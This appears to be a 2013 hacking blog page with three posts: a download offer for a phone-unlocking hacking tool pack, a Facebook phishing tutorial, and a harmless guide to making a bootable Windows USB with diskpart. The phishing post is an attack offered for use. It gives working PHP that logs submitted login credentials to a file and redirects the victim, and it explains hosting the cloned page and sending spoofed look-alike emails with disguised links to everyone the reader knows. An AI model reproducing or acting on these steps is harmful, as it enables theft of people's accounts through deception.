Sunday, 14 July 2013

Hack Mobile Phones (How To Unlock)

 



Download Free All Mobile Phone Unlocker 2010 | 253 MB
This is all in one program has extensive hacking tools so you can unlock your phones from almost all major manufacturers. I t contains ebooks,hacking tools,manuals to unlock almost all model available of popular brands..


MORE FEATURES:

  • Mobile Phone Unlocker Software pack wort 2500$ for Free for ISOFTDL USERS...
  • Unlocks (without cables) the following phones:NOKIA, MOTOROLA, ALCATEL, ERICSSON, PANASONIC, SAGEM, SAMSUNG, SIEMENS, SONY.


All Links are interchangable:
Download Link: 

DepositFiles Part I


DepositFiles Part II


DepositFiles Part III

OR

Download Link Mirrors:
HotFile Part I
HotFile Part II
HotFile Part II

How To Hack Facebook Account Passwords

How To Hack Facebook Account Passwords



Every Body Question About how can i  hackfacebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.
...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this





The big red ring that circles the
action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html

THREE...
Now that we changed the action to
next.php, we should also make a "next.php". open up notepad again. And write this...

Quote

header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Save this as "
next.php"

Note: for security you should rename "
passwords.txt" to something else.
now make a text file called "
passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...
SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail
DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the
Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it... 

 .........................................................................................................................................................................

.........................................................................................................................................................................

Monday, 29 April 2013

Making bootable USB of Windows 7/8 using CMD

Making bootable USB of Windows 7/8 using CMD


Making Windows7 or Windows 8 installation from your USB device is really too economic and easy just need to make it bootable by using Command prompt and ISO image of the Disk. Let see how to do that



It’s often very hectic to copy the entire DVD of 
windows 7 as ISO and buying a new DVD and then write the DVD to make the copy of Windows 7 bootable disk. Especially when one of your DVD is about to get scratch and again and again you are doing the same. Now a day everyone of us must having the USB flash drive of generally 2,4,8,16 GB. So here you can learn how to boot your computer from USB flash drive of minimum 4 GB.



Don’t worry i am not going to give you download link of any application that may or may not work with all type of ISO, as i also faced such problem. You can make the windows 7 bootable from just few commands in the command prompt only. All you need is the ISO or all the files or copy of DVD of windows 7 and Administrator right in your system.

Make bootable USB of Windows 7 by Command prompt (CMD)

I have assumed you have and DVD of windows 7 in your tray and a 4 GB Pen drive in one of your USB port. Backup all your pen drive data because it’s going to format :p






Insert your Pen drive and press the start button.

Type cmd and right click on it and start this with administrator right.

Now on the command prompt, type the following commands

Diskpart

List disk
// List disk command will generate the list of Disk connected to your computer like Hard disk and USB disk. This will be like in figure.
After this

select disk 1
   // in my case USB is as disk 1

create partition primary
active

format fs=ntfs quick //
 Format Filesystem=NTFS quick(don’t use Quick for deep format, just use format fs=ntfs)

assign

exit
 


After this your USB drive is ready to boot any computer just another step requires.
After this, copy all the content of DVD or Windows 7 ISO extract to USB drive.
Done?
Now open the command prompt again by typing CMD in run (See more shortcuts)
Now type
Cd o:/boot      //o: is the path of usb drive, change it as according
Now proceed as
Type
Bootsect \nt60 o:



And Hit the final Enter and you are ready.

Making bootable USB of Windows 8 using CMD

You can do all the same step there in windows 7 for making a bootable Windows 8 USB. Just use the all files of Windows 8.
Similarly in %usbroot%/Boot

And run the CMD as administrator and similarly select the same directory as in windows 7
i.e. I:/boot/ and type same command in CMD

Type bootsect /nt60 I:       //I is your USB drive

And done


Just reboot your computer, enter in BIOS setup and select boot device priority as

* USB

* DVD

* HDD

* Network (Other)

And Tap [F10] to save and Exit.

Again Reboot your system and see setup has been started.

Add your views by your expert comment and suggestion